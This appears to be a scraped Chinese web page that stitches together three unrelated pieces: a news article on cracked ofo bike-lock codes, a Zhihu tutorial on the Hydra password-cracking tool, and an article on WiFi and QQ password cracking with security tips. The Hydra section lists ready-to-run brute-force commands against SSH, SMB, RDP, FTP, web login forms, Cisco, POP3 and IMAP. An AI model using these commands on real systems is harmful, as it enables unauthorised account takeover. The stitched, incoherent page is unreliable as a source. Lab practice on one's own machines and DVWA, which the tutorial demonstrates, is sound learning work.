5元钱就能永久破解天津共享单车密码？为了治这些人，OFO准备升级智能锁啦！
话说，你们知道ofo有好几个漏洞可以免费骑车吗？
再不换锁，ofo快被玩坏了
"小孩5秒解锁共享单车密码”、“花5元可永久获取密码”……最近有人发现，花钱“购买”密码后，在大沽南路、友谊路等地点随便找到ofo共享单车测试，输入3个车牌号，其中有2辆车可以打开。
打开排名第一的“ofo小黄车密码共享平台”，只见在最显眼的位置只有三行文字，分别是“车牌号”“免费获取密码”“密码共享QQ群×××××”，用户只要输入车牌号，点击“免费获取密码”，就能获得密码。
（ofo 目前所使用的两种机械锁）
现在的ofo密码共享群，里面的人都冲着共享密码而来，活跃度很高。官方骑行1块钱的价格，在这里变成了5毛钱，甚至还有人3毛就能告诉你车锁密码。
一些共享单车的解锁方式过于简单，如果前一个使用者完成骑行后，未将密码打乱，下一个使用者可以直接开锁。更有媒体报道，只要注意观察密码按键，小学生5秒就能给单车解锁。
据调查，5元钱永久提供密码，每天免费获取1次密码，每天13：30到17：00和21：00到24：00。
目前大部分ofo小黄车都是机械锁，一个车牌号对应一组密码，都是固定不变的，现在网上的一些ofo密码共享群就是利用了这个漏洞，将大量车牌号和密码形成数据库，实际上就是进行简单搜索即可得出密码。
极笔北客：之前说过，防盗是共享单车能否持续下去的关键点之一，不解决，迟早完蛋。
弹指一挥间之2012： 共享单车领域发生了返祖现象。
QJ_ERVIES：骑个单车而已，何需抠门那一块两块的，显得没有教养。
Jasmine饭：你们这样的人照镜子看自己的时候都不觉得脸红不觉得羞愧吗！
律师说了：买卖密码都属违法行为！
共享单车这种分时租赁模式，付租金后开锁就相当于骑车人和租车公司双方建立了合同关系。一些人靠非法手段提供密码给用户，此举侵害了个人和商家的债权关系，非法“购买”密码骑车，很容易被认定为盗窃行为。
（ofo新更换的智能锁）
ofo公关总监史少晨表示：按计划，ofo会逐步将旧车中的机械锁更换为新智能锁。
日前，共享单车平台ofo已经宣布与中国电信、华为合作，共同研发基于新一代物联网NB-loT技术的共享单车智能解决方案。根据合作内容，中国电信将为ofo提供无线网络资源；华为将为ofo提供NB-IoT芯片，并提供网络技术支持。而此次合作旨在提出可替代机械锁的智能锁解决方案。
这样一来，各种“共享单车密码破解群”大概可以解散了。
来源：天津日报、中新网、法治周末
新媒体编辑 于穆铭
这么贴心还不给小编点个大拇指！
新报精华文章导读
每日新报公众平台
我们了解天津这座城
点击左下角的“阅读原文”，一秒钟关注我们。
商务合作：022-
责任编辑：
声明：本文由入驻搜狐号的作者撰写，除搜狐官方账号外，观点仅代表作者本人，不代表搜狐立场。
今日搜狐热点黑客破解密码的原理是什么？ - 知乎68被浏览<strong class="NumberBoard-itemValue" title="2分享邀请回答thc.org/thc-hydra/Windows：Linux： 更多版本工具获取 黑协十五周年纪念优盘里头有。首先，我们来看看hydra的帮助文档。终端输入命令:hydra -h我们可以看到他支持的破解服务非常多。例如:rdp，ftp，Cisco等。现在，我以我物理机win10进行破解演示。我先win10上设置一个用户名为 admin 登录密码也为 admin 的用户。现在回到Kali上。我用 nmap 对这台服务器上开放的端口进行扫描。输入命令:nmap -p 1-.1.100通过 nmap 的扫描，我们可以看到开放了很多危险端口。现在，让我们尝试进行 smb 服务的破解。输入命令:hydra -l admin -P pass.txt smb://192.168.1.100-l: 用户名。-P: 密码字典。-t: 代表线程数。过大的线程，极易导致hydra的奔溃。-vV: 显示详细过程可以看到很快我们就获得了密码：admin admin 。我们可以看到密码为
。hydra不仅支持命令操作，它还支持图形化界面。输入命令: xhydra 就可以打开它的图形界面了。操作和命令是一样的。最后为大家介绍下表单的破解。我们以 DVWA为例。DVWA是以 post 方式进行提交的。我们输入以下命令:hydra -l admin -P pass.txt 192.168.30.128 http-post-form“/dvwa/login.php:username=^USER^&password=^PASS^&Login=login:S=index.php” -t 1 -vVhttp-post-form : 表单提交方式。“/dvwa/login.php:username=^USER^&password=^PASS^&Login=login:S=index.php” 这一串代表的是post 提交时的数据。S 表示成功登录时的特征。很快密码也被破解了出来。密码: password 。可以看出，用hydra破解表单密码是非常复杂的。因此，建议破此类密码可以用其它工具。1、破解ssh：hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp：hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交，破解web登录：hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交，破解web登录：hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"（参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当破解了一个密码就停止， 10.36.16.18目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解,&title&中的内容是表示错误猜解的返回信息提示。）5、破解https：hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak：hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco：hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb：hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3：hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp：hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy：hydra -l admin -P pass.txt http-proxy://10.36.16.1812、破解imap：hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN更多干货学习，关注“合天智汇”公众号哟！352 条评论分享收藏感谢收起56 条评论分享收藏感谢收起写回答后使用快捷导航没有帐号？
黑客需要花多长时间破解你的QQ密码？怎样预防
15:40|来自: |
|查看: 32324
　　原标题为“黑客要花多长时间破解你的WiFi密码？”小编感觉内容很不错就拿来和腾讯爱好者的朋友一起分享了。当然，密码的设置和预防不管是对于QQ密码还是wifi密码目标都是一个“安全”！　　黑客破解QQ密码的速度，与密码的复杂程度，以及黑客使用的“密码字典”、电脑运算能力等因素都有着直接关系。按照目前主流的WPA/WPA2方式加密进行实测破解，结果表明：　　一、纯数字密码最弱！一般可在5分钟内破解。数字组合越有规律、破解速度就越快，例如888888这类弱密码，都是排在密码字典前面，基本可以秒破；　　二、小写字母组合次之，10分钟内大多也能搞定。最好破解的小写字母组合也是常见的弱密码，比如password、iloveyou或者qwertyui（不理解的低头看键盘）之类的，这种密码甚至比一些数字密码能更快从密码字典跑出来；　　三、“小写字母+数字”组合、“大小写字母”组合这类混搭密码的破解难度相对较高，如果遇上asd123456、abcd1234这类常见密码，一小时内也能搞定。如果是比较古怪生僻的组合，可能需要几个小时；　　四、最难破解的是“大小写字母+数字+特殊符号”组合，正常情况下几个小时内都破解不了，黑客可能就会放弃了。　　如果用WPA/WPA2加密认证方式，WiFi密码设置得超级复杂，黑客是不是就一定无法破解呢？答案是风险仍然存在。　　不知道大家有没有注意到路由器的QSS（一键加密）功能，家用路由器普遍都有这个功能（有的品牌路由器设置中此功能名为WPS），而且默认开启。使用QSS/WPS功能时，用户的电脑想要连WiFi，可以跳过输入WiFi密码的步骤，选择物理点击路由器机身的规定按钮，即可连网。但是这个功能暗含了一个8位数的pin码，相当于打开了接入WiFi的另一道门。无论WiFi密码设置得多么复杂，黑客也可以百分百可以破解这个8位数的pin码。　　揭秘黑客如何破解WiFi　　WiFi密码为什么会被破解呢？要解释这个问题，有必要简单了解一下黑客破解WiFi密码的步骤。　　1、首先，黑客需要身处你的WiFi覆盖范围之内。　　2、当黑客搜寻到你的WiFi之后，下一步，就需要等待你的手机或电脑等无线设备连入你的WiFi。　　3、当你的无线设备连入WiFi时，会先向无线接入点（即无线AP）发送认证请求，专业术语是握手申请。　　无线AP收到请求以后，会将一段随机信息发送给无线设备（天王盖地虎）；　　无线设备将接收到的这段随机信息进行加密，再发回给无线AP（小鸡炖蘑菇）；　　无线AP检查加密的结果是否正确，如果正确则同意连接（革命同志欢迎你，“握手”成功）。　　这就是黑客伺机等待的时刻。这一来二去“对暗号”的过程，会被黑客用监听工具（支持监听模式的无线网卡）接收，也就是抓取了“握手包”。这个“握手包”里就包含了你的密码信息。　　4、接下来，黑客就会用自己的“密码字典”破解这个“握手包”，最终获得你的WiFi密码。　　“密码字典”可以被理解成是一个庞大的密码库。破解时，字典里的密码逐一碰撞握手包里的信息，一旦匹配，黑客即可获知你的WiFi密码。　　黑客字典里会包含常见的密码组合，如，出生年月日格式的数字段如。这也就是为什么我们说密码设置要越复杂越好的原因。类似的弱密码，将会被黑客字典优先尝试匹配，破解时间仅需几秒。　　以上的过程，是针对WPA和WPA2加密方式的WiFi密码进行破解，这也是当前最主流的WiFi密码加密方式。如果路由器仍然在使用更不安全的WEP加密方式，那么即使密码再复杂，黑客也能在5分钟之内轻松破解。　　保护WiFi安全可以更简单……　　根据黑客破解密码的途径，我们大致可以总结出一些保护WiFi安全的有效手段：　　1、密码的设置最好混用数字、大小写字母和特殊符号，尽可能无规律，不要涉及生日等个人信息。　　2、在路由器管理后台设置使用WPA/WPA2的加密方式，并关闭路由器的QSS（又名WPS）功能。　　3、既然WiFi密码不保险，那么我们就需要有发现敌人入侵的能力。这里推荐一款名叫360路由器卫士的软件，它的主要作用是可以在陌生设备接入WiFi时发出报警提示，就好像给WiFi装上一个门铃，陌生人进来得先敲门，这样就从根本上杜绝了被蹭网的风险。腾讯爱好者官方友情提示：1、我们的官方网址是：2、我们的淘宝优惠券网址：3、我们的官网交流群：交流获取最新活动资讯4、我们的线报禁言群：获取线报和淘宝BUG优惠券感谢大家一路的支持，有什么好的建议或者意见加群联系我们的管理哦
大家还关注
|||||||||||||